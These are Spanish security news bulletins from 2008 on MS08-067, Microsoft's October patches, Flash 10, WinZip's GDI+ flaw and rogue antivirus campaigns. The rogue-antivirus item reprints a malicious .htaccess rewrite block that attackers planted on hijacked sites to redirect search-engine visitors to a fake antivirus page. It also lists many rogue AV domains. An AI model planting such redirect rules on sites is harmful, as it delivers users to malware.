Último parche de Microsoft: ¿Sufriremos otro Blaster?... No.

El día 23 Microsoft publicó un parche fuera de su ciclo habitual, de carácter crítico, en el que se solucionaba un problema de seguridad en el servicio Server de las distintas versiones del sistema operativo Windows. Avisó con un día de antelación. Hoy, el exploit ya es público. Las características de la vulnerabilidad hacen que sea "ideal" para ser aprovechado por un gusano tipo Blaster, que se convirtió en epidemia en 2003. ¿Podría pasar lo mismo con este fallo? En julio de 2003 se descubre el desbordamiento de memoria intermedia en la interfaz RPC de sistemas Windows que, a la postre, permitiría la aparición del fatídico gusano Blaster. Otro fallo parecido un año después propició el nacimiento de Sasser, otro popular gusano. El último parche publicado por Microsoft de forma urgente, el MS08-067, tiene las mismas características: un desbordamiento de memoria intermedia en el procesamiento de peticiones RPC (Remote Procedure Call) que efectúa el servicio Server. ¿Se creará otro gusano parecido? Lo que hace que esta vulnerabilidad sea especialmente peligrosa, es que es explotable de forma remota sin interacción del usuario: un atacante envía una petición especialmente manipulada a un puerto, y ya puede ejecutar código en el sistema con los máximos privilegios. Candidato ideal para un gusano "como los de antes". De ahí que Microsoft, con buen criterio, se haya lanzado a romper su ciclo habitual. Quizás motivado porque el fallo ha sido descubierto cuando ya se estaban produciendo ataques muy concretos. No a gran escala, pero sí que se han detectado incidentes que demostraban que los atacantes conocían el problema y lo estaban aprovechando en secreto. La última vez que Microsoft publicó una actualización de seguridad fuera de su ciclo habitual de actualizaciones fue el 3 de abril de 2007. El último problema de este tipo (explotable enviado peticiones a un servicio) se vio hace más de dos años. Lo trataba el boletín MS06-040 y también afectaba al servicio Server (de hecho este nuevo boletín lo reemplaza). Se hizo público el exploit y hubo malware que lo aprovechaba, pero no fue epidemia. En este caso pensamos que tampoco se convertirá en el problema que antaño suponían estas vulnerabilidades. Por varias razones. ¿Por qué creemos que el potencial gusano no se convertirá en epidemia? Microsoft cometió enormes y numerosos fallos de seguridad de este tipo en el pasado. Los gusanos de infección masiva campaban a sus anchas. Pero intentó solucionarlo a través de varios métodos. Primero con su nueva estrategia de seguridad anunciada hacia 2002. Desde entonces (tarde quizás) la seguridad sería prioridad. El problema es que, sobre una base tan débil, los resultados han tardado en observarse... pero están ahí. Por ejemplo, sobre Vista y Windows 2008 esta última vulnerabilidad no es crítica sino sólo "importante", que no es poco. En las últimas versiones de Windows el atacante debe estar autenticado para poder hacer que el exploit ejecute código. Si no, sólo se provocará una denegación de servicio. Con el Service Pack 2 de Windows XP se activa el cortafuegos entrante por defecto. Esto mitiga enormemente las posibilidades de explotación de este tipo de fallos. De hecho, desde que el Sevice Pack fue lanzado en agosto de 2004, el malware se trasladó al navegador. Al no poder aprovechar fallos en los servicios por culpa del cortafuegos, necesitaban colarse en los sistemas de otra forma, e Internet Explorer sufrió la consecuencias. Todavía hoy es la forma favorita del malware de ejecutar código. Por si fuera poco, hoy en día, los usuarios están más que nunca detrás de un router casero que protege, en principio, los puertos del ordenador. También, con XP, Microsoft introdujo una considerable mejora: muchos de los servicios por fin no se ejecutaban bajo el contexto del usuario más poderoso, SYSTEM. En Windows 2000, por el contrario, todos los servicios corrían con los máximos privilegios. Aunque para el caso esta medida no sirve. Svhost.exe y services.exe corren en XP y 2000 bajo los permisos de SYSTEM. Por otro lado, a partir de Vista el ASLR (Address Space Layout Randomization) impediría en buena medida también la ejecución de código. Otro aspecto que mitiga el potencial problema es que Microsoft ha liberado el parche antes de que se haga público el exploit. En 2003 con Blaster ocurrió también. El parche estaba disponible un mes antes de que apareciera el gusano. Pero los usuarios tenían otra cultura. Hoy en día, aunque no demasiado, la educación sobre seguridad es mayor. Las actualizaciones automáticas también ayudan bastante. El fallo puede ser más grave en empresas. Si un sistema se infecta con un gusano que aproveche esta última vulnerabilidad, es muy probable que pueda acceder a los puertos de otros ordenadores de la misma red sin que se vea bloqueado por cortafuegos. Sobre todo si la red no está convenientemente segmentada. Los administradores de grandes redes corporativas deben estar especialmente atentos a este boletín y parchear lo antes posible. También los que compartan recursos del sistema en una red interna o hacia el exterior. Aunque parece que se han observado reportes de que el fallo se está aprovechando desde hace tres semanas, la actuación de Microsoft ha sido rápida. Detectar y analizar el problema lleva tiempo. Muchos analistas prestigiosos se han aventurado en el pasado a calificar de nuevos fallos problemas ya conocidos que ,simplemente, estaban siendo aprovechados a través de otro vector de ataque. Además hay que añadir el tiempo de comprobación del parche. Es un proceso que Microsoft se toma con cuidado y tres semanas no es un tiempo descabellado. Esperemos en todo caso que la actualización corrija por completo la vulnerabilidad y que no se detecten problemas de estabilidad. Por último, las casas antivirus están trabajando incansablemente para detectar potenciales exploits y el malware que lo acompaña. Estos fallos alcanzan gran repercusión y no pueden permitirse el lujo de no crear firmas específicas para bloquearlos. Aunque el volumen de malware a tratar sea infinitamente mayor, el número de actualizaciones de firmas es mayor que en 2003. En ese año, actualizar cada varios días era normal, mientras hoy casi todos los antivirus actualizan las firmas varias veces al día. En definitiva, el fallo es grave, es necesario actualizar ya. Sin excusas. No se han reportado problemas de estabilidad con el parche. Pensamos que sería muy raro que se produjese una epidemia como la de 2003. Aunque los índices de infección de malware son hoy mayores que nunca, al menos no son gracias a este tipo de errores tan "sencillos" de explotar.

Activar los killbits y el índice de explotabilidad

Microsoft está siguiendo una nueva política con la que intenta mejorar sus boletines de seguridad. Este mes ha introducido un nuevo valor llamado "índice de explotabilidad" (exploitability index) que indica las posibilidades de que se cree un exploit para cada vulnerabilidad. Además, se está proponiendo (por fin) activar el mayor número de killbits posibles para evitar ataques a través de ActiveX vulnerables. En octubre Microsoft ha incluido por primera vez en sus boletines el "exploitability index", un valor que intenta predecir la posibilidad de que los atacantes creen código capaz de aprovechar la vulnerabilidad. Los valores posibles que asignará Microsoft son: * Consistent exploit code likely: Es probable la creación de un exploit consistente. * Inconsistent exploit code likely: Es probable la existencia de un exploit incosistente. * Functioning exploit code unlikely: Es improbable la existencia de un exploit funcional. Refiriéndose con "consistencia" a las probabilidades que funcione bajo la mayoría de las circunstancias y la mayor parte de las veces. Esta forma de puntuar el riesgo es exclusiva de Microsoft, y evaluada solo por su parte. Por ejemplo, en esta última tanda de boletines, se resuelven 20 vulnerabilidades. Según Microsoft 8 tienen posibilidades de que se cree un exploit consistente para ellas, y cuatro son poco probables de ser aprovechadas. Para otras incluso, como el fallo en Windows Printing Service de Internet Information Services (IIS) Web server, se tiene constancia de que están siendo activamente aprovechadas. Para una de las que predijo la posibilidad de un exploit consistente, efectivamente se ha publicado posteriormente código capaz de aprovechar el fallo. Microsoft sigue resistiéndose sin embargo a añadir a sus boletines el valor CVSS (Common Vulnerability Scoring System) de cada vulnerabilidad. Se trata de un estándar que gradúa la severidad de manera estricta a través de fórmulas establecidas y que ya siguen Oracle y Cisco entre otros. Cuando fue creado en 2005, la compañía apoyó la iniciativa, pero más tarde adujo que su sistema propio de graduación era correcto, y nunca ha terminado de apoyar este estándar. Por último, destacar que Microsoft últimamente está incluyendo boletines oficiales destinados a activar los killbits de componentes ActiveX, tanto propios como de terceros. Esto es muy positivo. Los ActiveX suelen ser librerías de Microsoft o de terceros que, en muchas ocasiones, sirven de puerta para entrar en el sistema a través de Internet Explorer, gracias a los fallos de seguridad de los propios ActiveX. El peligro está en que el navegador es capaz de invocarlos, aunque no sea realmente necesario para cumplir su función. Al activar el killbit, se asegura que Internet Explorer no puede llamarlos y se anula así un importante vector de ataque. Al difundir esta activación de killbits a través de las actualizaciones oficiales de Microsoft, se aseguran mitigar potenciales problemas con una difusión mucho más extensa que si lo hiciera el propio fabricante del ActiveX. Aunque es obligación de los programadores de ActiveX ser precavidos y activar ese killbit, en la mayoría de las ocasiones sólo una vulnerabilidad les hace reaccionar. Usar los parches de Microsoft para anular este vector de ataque, puede impedir muchos problemas de manera mucho más rápida y mayoritaria. En esta última tanda de boletines (como medida extra de precaución) se han activado los killbits incluso de ActiveX propios de Microsoft que ya habían sufrido vulnerabilidades y para los que existían parches.

La doctora Radia Perlman invitada de honor a DISI 2008

Desde el año 2006 la Cátedra UPM Applus+ de Seguridad y Desarrollo de la Sociedad de la Información, CAPSDESI, viene organizando el Día Internacional de la Seguridad de la Información bajo las siglas DISI. Una iniciativa de la Association for Computing Machinery ACM que en 1988 propone celebrar todos los años, con fecha 30 de noviembre o día laboral más próximo, el Computer Security Day CSD, con el objetivo de concienciar a la sociedad sobre la importancia de la seguridad en el uso de las Nuevas Tecnologías de la Información. La tercera edición del DISI se celebrará el lunes 1 de diciembre de 2008 desde las 09:00 hasta las 15:15 horas, en el Salón de Actos del Campus Sur de la Universidad Politécnica de Madrid, España, contando en esta ocasión con la destacada presencia de la Dra. Radia Perlman, Sun Microsystems Fellow Network Protocols and Security Project Principal Investigator en Estados Unidos, connotada investigadora de seguridad en redes, autora de dos libros sobre networking y con más de 50 patentes a su haber en Sun. La Dra. Perlman es además ganadora de varios premios, nominada en dos ocasiones como una de las 20 personas más influyentes en la industria de los Estados Unidos por Data Communications Magazine y en muchos medios de comunicación es reconocida como "la Madre de Internet" gracias a su invento del spanning-tree protocol. DISI 2008 contará también con la participación del Dr. Arturo Ribagorda, Director del Grupo de Seguridad de la Información y de las Comunicaciones de la Universidad Carlos III de Madrid; de D. Juan Salom, Responsable del Grupo de Delitos Telemáticos de la Guardia Civil; de D. Manuel Vázquez, Jefe de la Brigada de Investigación Tecnológica de la Policía Nacional y de D. Andrés Velázquez, Director de Investigaciones Digitales de Mattica en México, todos ellos excelentes profesionales con un reconocido prestigio internacional y que presentarán el estado actual de la investigación en materias relacionadas con la seguridad, el uso de las técnicas forenses y las amenazas del cibercrimen y el ciberdelito que se ciernen sobre nuestra Sociedad de la Información. Tras estas conferencias, se realizará una Mesa Redonda con el título "Forensia Informática y Amenazas del Cibercrimen", momento oportuno para que los asistentes puedan consultar a los expertos sobre, por ejemplo, el alcance de estas amenazas, las tendencias de futuro en el malware, los avances en la guerra digital e information warfare, los peligros inherentes al mal uso de la red, la diversidad de delitos que a través de ella se cometen diariamente o el importante papel que cumple la forensia informática en la investigación y el posterior esclarecimiento de los mismos. Como en años anteriores, algo que además es un sello característico en todas las acciones de la Cátedra UPM Applus+, la asistencia al evento es totalmente gratuita. No obstante, se requiere (y se recomienda encarecidamente por motivos logísticos) hacer la preinscripción en la plataforma Moodle del servidor Web de la cátedra www.capsdesi.upm.es, sitio donde podrá encontrar también toda la información relativa al DISI 2008. Si tuviese cualquier impedimento para realizar la inscripción mediante este medio o prefiere hacerla vía telefónica, por favor contacte con Dña. Beatriz Miguel Gutiérrez al teléfono +34 913367842. El evento se transmitirá por videostreaming para aquellos interesados que no tengan la oportunidad de asistir al congreso. El enlace de conexión se dará a conocer unos días antes de DISI 2008, entre otros, en el sitio Web de la cátedra y en el servidor de la Red Temática Iberoamericana de Criptografía y Seguridad de la Información CriptoRed www.criptored.upm.es. DISI 2008 cuenta con la colaboración de ASIMELEC, Red Seguridad, Hispasec Sistemas, ATI, ISSA España y Linux+. En definitiva, una nueva ocasión para ser partícipes de interesantes conferencias impartidas por destacados ponentes de Estados Unidos, México y España, así como protagonistas del análisis del estado actual del arte en estas materias de máxima actualidad, con el objetivo de hacer nuestro el lema del Computer Security Day para este año 2008: "A Good Defense".

Boletines de seguridad de Microsoft en octubre

Tal y como adelantamos, este martes Microsoft ha publicado once boletines de seguridad (del MS08-056 al MS08-066) correspondientes a su ciclo habitual de actualizaciones. Según la propia clasificación de Microsoft seis de los boletines presentan un nivel de gravedad "importante", otros cinco son "críticos" y uno tiene un nivel "moderado". Los boletines "críticos" son: * MS08-057: Actualización para Microsoft Office Excel que corrige tres vulnerabilidades que pueden permitir la ejecución remota de código arbitrario, si un usuario abre un archivo Excel específicamente manipulado. * MS08-058: Actualización acumulativa para Microsoft Internet Explorer que además soluciona cinco nuevas vulnerabilidades que podrían permitir la ejecución remota de código arbitrario. Afecta a Internet Explorer 5.01, 6 y 7. * MS08-059: Actualización para solucionar una vulnerabilidad de ejecución remota de código en Microsoft Host Integration Server. * MS08-060: Actualización que resuelve una vulnerabilidad en implementaciones de Active Directory en Microsoft Windows 2000 Server, que podría ser aprovechada por un atacante remoto para ejecutar código arbitrario. Sólo afecta a los servidores de Microsoft Windows 2000 que se han configurado para ser controladores de dominio. Los boletines clasificados como "importantes" son: * MS08-061: En este boletín se ofrece una actualización para resolver tres vulnerabilidades en el kernel de Windows y que podría ser aprovechada por un atacante local para lograr el control completo de un sistema afectado. * MS08-062: Actualización para corregir una vulnerabilidad en el servicio de impresión en Internet de Windows que podría permitir la ejecución remota de código en el contexto del usuario actual. * MS08-063: Actualización para resolver una vulnerabilidad en el protocolo SMB de Microsoft , que podría permitir la ejecución remota de código arbitrario en un servidor que comparta archivos o carpetas. Afecta Windows 2000, XP, Vista y Windows Server 2003 y 2008. * MS08-064: Actualización destinada a corregir una vulnerabilidad de escalada de privilegios en el descriptor de direcciones virtuales. Afecta Windows XP, Vista y Windows Server 2003 y 2008. * MS08-065: Corrige una vulnerabilidad de ejecución remota de código en Message Queue Server (MSMQ) en sistemas Microsoft Windows 2000. * MS08-066: Esta actualización de seguridad resuelve una vulnerabilidad en el controlador de función auxiliar de Microsoft, que podría ser aprovechada por un atacante local para lograr el control completo de un sistema afectado. Por último, la clarificada como "moderada": * MS08-056: Esta actualización de seguridad resuelve una vulnerabilidad de divulgación de información, que reside en la forma en que Office procesa los documentos mediante el protocolo CDO (cdo:) y el encabezado Content-Disposition: Attachment. Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche. Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible.

Adobe Flash 10 y las vulnerabilidades "oportunas"

Flash ya va por su versión 10. En esta nueva actualización, Adobe ha potenciado sobre todo las posibilidades de explotar el sonido por parte de los diseñadores. El problema es que con esta versión, además, aprovecha para dejar sin resolver temporalmente varios problemas de seguridad en su rama 9. Además de los antivirus "rogue" (falsos antivirus que no son más que malware) también está últimamente de moda entre los atacantes intentar que los usuarios de Windows descarguen una supuesta nueva actualización de Flash. Cuando acceden a un enlace donde se promete un apetitoso vídeo de YouTube, se pide la descarga de una nueva versión de Flash que corresponde con el malware en sí. Adobe, oficialmente, acaba de sacar su versión 10 de Flash Player y obviamente, recomienda su descarga. Es posible que esto confunda a usuarios que estén al tanto de la publicación de la nueva versión legítima de Flash, resultando así la ingeniería social más efectiva. Ante este potencial peligro, es necesario insistir en que las actualizaciones en general deben realizarse sólo a través de las páginas oficiales, además de comprobar que el archivo se encuentra firmado digitalmente por la compañía adecuada (algo que realiza Windows de forma automática por defecto). Entre las mejoras, Flash 10 corrige la funcionalidad de versiones anteriores que permite a una web secuestrar el portapapeles. Con la función "setClipboard" de ActionScript (el lenguaje de programación de Adobe Flash) se puede modificar (pero no acceder) el contenido del portapapeles. Esto se está aprovechando actualmente para, a través de un archivo SWF, modificar a gusto del atacante el contenido del clipboard. Curiosamente, Flash 10 introduce una nueva función Clipboard.generalClipboard.getData que sí permite la lectura del portapapeles bajo ciertas circunstancias. Esto sí que podría llegar a suponer un problema grave de seguridad si se saltan las restricciones tenidas en cuenta por Adobe. Adobe admitió el potencial peligro de estas funciones pero aun así no lo ha solucionado en las versiones anteriores a la 10. Como muchas otras compañías hacen, corregir exclusivamente en versiones avanzadas ciertos problemas (que pueden ser incluso de seguridad) sirve como excusa para fomentar una migración a su software más moderno. Por ejemplo, en estos momentos existen cinco potenciales fallos de seguridad en la rama 9 de Flash, que han sido solucionados exclusivamente en la 10. Para su versión 9, muy usada aún, se prolonga "artificialmente" la espera de la actualización hasta principios de noviembre. Esta "técnica" es usada por muchas empresas. Algunas vulnerabilidades le son "oportunas" y aprovechan para actualizar sólo en una rama superior de su producto, forzando así una migración. Se usa la seguridad como moneda de cambio bien para obligar (como es el caso) a la conveniente actualización de un cliente gratuito (pero cuyo contenido se desarrolla con programas de pago), bien para directamente vender nuevos productos. Un caso especialmente llamativo ocurrió con Microsoft y su Windows NT. A finales de marzo de 2003 Microsoft publicaba un boletín de seguridad para advertir de una vulnerabilidad en el servicio RCP Endpoint Mapper que podría ser aprovechada para provocar una denegación de servicio contra NT 4.0, 2000 y XP. En el apartado de actualizaciones, se informaba de que sólo estaban disponibles los parches para las versiones de Windows 2000 y XP, aun encontrándose NT en su ciclo normal de actualizaciones (no terminó oficialmente hasta enero de 2005). La excusa oficial: las propias limitaciones arquitectónicas de Windows NT 4.0, que es poco robusta en comparación con Windows 2000, y que requeriría demasiadas modificaciones para solucionar el problema. La excusa no se sostenía: La vulnerabilidad estaba ahí desde antes de ser descubierta... ¿y si hubiera salido a la luz unos años antes, cuando no existía Windows 2000? ¿Habrían dicho igualmente que es imposible de solucionar? Este incidente significaría el principio del fin para un producto que incluso hoy en día está muy arraigado en las empresas.

Los falsos antivirus y el uso fraudulento del .htaccess de páginas legítimas

La industria antivirus "alternativa" está en pleno auge. Se trata de antivirus falsos (llamados "rogue") que habitualmente se hacen pasar por una milagrosa cura para un sistema completamente infectado. Sus páginas parecen profesionales y engañan a los usuarios a través de una animación falsa donde supuestamente se detecta una gran cantidad de malware en el sistema y se propone la descarga del verdadero virus para desinfectar. Publicitar este tipo de "antivirus" es una tarea que se toman muy en serio. Los antivirus "rogue" no son más que malware camuflado bajo el aspecto de un antivirus. Suelen diseñar una página de aspecto profesional desde donde puede descargarse. Para incitar a la instalación, simulan mediante una animación Flash que el sistema está siendo analizado en vivo y que se ha encontrado mucho malware que el falso antivirus puede eliminar. La animación suele ser la misma independientemente del sistema operativo que se utilice para visitar la web. Los creadores de este malware necesitan que se visite este tipo de páginas para que el usuario descargue y ejecute. Resulta una alternativa a la ejecución automática en la víctima aprovechando vulnerabilidades. Este sistema de ingeniería social cubre por ejemplo, la "cuota de mercado" que resta de usuarios que no pueden ser infectados a través de fallos de seguridad porque su sistema está al día. Los dominios que alojan este tipo de malware se han multiplicado en el último año. Suelen tener el aspecto de: [ATENCIÓN, pueden contener malware, NO se deben visitar a menos que se sepa lo que se está haciendo]. antivirus-scanner-online .com, online-av-scan2008 .com, antivirus-online-08 .com, anti-virus-xp .com, anti-virus-xp .net, i-spyware8 .com, anti-spyware4 .com, smartantivirus2009v2 .com, smartantivirus2009v2-buy .com, anti-spyware11 .com, anti-spyware10 .com, antivirus-cs1 .com antivirus-cs14 .com, anti-virusxp2008 .net, antimalware09 .com, antivirxp .net, av-xp08 .net, av-xp2008 .com, av-xp2008 .net, avx08 .net, axp2008 .com, e-antiviruspro .com, online-security-systems .com, xpprotector .com, pvrantivirus .com, wav2008 .com, wiav2009 .com, win-av .com, windows-av .com, windowsav .com y un largo etcétera. La técnica que se está observando últimamente es la del uso de banners y anuncios (Adsense, principalmente) para invitar al usuario a la descarga del supuesto antivirus a través de una publicidad que parece "normal". Incluso invierten (probablemente usando tarjetas robadas) en anuncios en páginas legítimas. Ahora han ido un paso más allá usando el archivo .htaccess de servidores legítimos, que consiguen controlar bien robando sus credenciales o aprovechando fallos de seguridad del sitio. .htaccess es un archivo de Apache que permite controlar el acceso al directorio web donde esté alojado. Permite bloquear el acceso por direcciones IP o por otras reglas. Una posibilidad es por ejemplo usar el REFERER, o "desde qué página se ha llegado" y poder redirigir al visitante en consecuencia gracias al RewriteEngine del servidor web. Se han observado cambios como estos en los archivos .htaccess modificados en webs legítimas. RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]

RewriteRule .* http://webdelsupuestoantivirus.com/ [R,L]

Errordocument 404 http://webdelsupuestoantivirus.com/ Lo que resulta curioso. Si un usuario visita directamente una página web con el .htaccess modificado de esta forma, en principio no pasará nada. Pero si la visita se realiza desde uno de los buscadores que aparecen (la víctima viene de Google, AOL, msn...), como el HTTP_REFERER cumple una de las condiciones de la expresión regular, será redirigido según la regla "RewriteRule" a la web del supuesto antivirus de forma automática. También si se visita una web que no exista (el servidor devuelve un 404). Resulta especialmente rebuscado, pero al parecer eficaz. Los atacantes están aprovechando cada vez más las etiquetas User-Agent y Referer del protocolo HTTP para "personalizar" ataques. Si no son imprescindibles para el usuario, se puede añadir una pequeña capa de protección modificando estos valores través de un proxy. Por supuesto, además, conviene descargar y utilizar antivirus sólo de marcas reconocidas.

Ejecución remota de código a través de WinZip en Windows 2000

Se han encontrado múltiples problemas de seguridad en WinZip 11.x que podrían ser aprovechadas por un atacante remoto para ejecutar código arbitrario en sistemas Windows 2000. A pesar de que existen alternativas gratuitas y de código abierto, WinZip es actualmente unos de los compresores más extendidos debido a su modo sencillo de trabajar con los archivos y a que permite el manejo de numerosos formatos de compresión, siendo el .zip el usado por defecto. Las vulnerabilidades encontradas están causadas porque WinZip 11.x incluía en la carpeta del programa una versión vulnerable de la librería GDI+ de Windows (gdiplus.dll) para procesar archivos de imagen. –La versión 11.0 la incluía siempre aunque las 11.1 y 11.2 sólo si los equipos estaban basados en Windows 2000-. Aprovechándose de esta circunstancia, un atacante remoto podría ejecutar código arbitrario si un usuario hiciera uso del modo de visualización para intentar acceder una imagen especialmente modificada contenida en un archivo zip. El ataque sería efectivo solamente sobre sistemas basados en Windows 2000 ya que son los únicos que harían uso de la librería obsoleta situada en la carpeta de WinZip en vez de usar la versión de la misma librería que viene junto con el sistema operativo, y que fue actualizada en el último ciclo de actualizaciones. En el boletín de seguridad MS08-052 publicado por Microsoft el día 9 de septiembre, se daban a conocer los detalles de las cinco vulnerabilidades críticas en el componente GDI+ de Windows que podrían ser aprovechadas para ejecutar código arbitrario. Son las siguientes: * Un desbordamiento de búfer basado en heap cuando GDI+ procesa de forma incorrecta el tamaño de los gradientes manejados por la librería de enlaces a vectores gráficos. * Un error al manejar la reserva de memoria cuando se procesa un archivo de imagen EMF (Enhanced Metafile) especialmente manipulado que podría causar una corrupción de memoria. * Un problema de seguridad al procesar los archivos GIF (Graphics Interchange Format) especialmente manipulados. * Un desbordamiento de búfer en GDI+ causado por un fallo al reservar memoria cuando se analiza un archivo WMF (Windows Metafile) especialmente manipulado. * Un desbordamiento de enteros al procesar de forma inadecuada ciertas cabeceras mal formadas en archivos BMP especialmente manipulados. El pasado 25 de Septiembre WinZip Computing lanzaba WinZip 11.2 SR-1, una actualización de seguridad para los usuarios de las versiones 11.x de WinZip en la que se reemplaza la versión obsoleta de gdiplus.dll por la versión actualizada, no vulnerable a los citados problemas. La URL de descarga de WinZip 11.2 SR-1 (Build 8261) es: http://download.winzip.com/nrb/winzip112.exe La versión 12 de WinZip, que tampoco sería vulnerable, se puede obtener desde: http://update.winzip.com/downwz.htm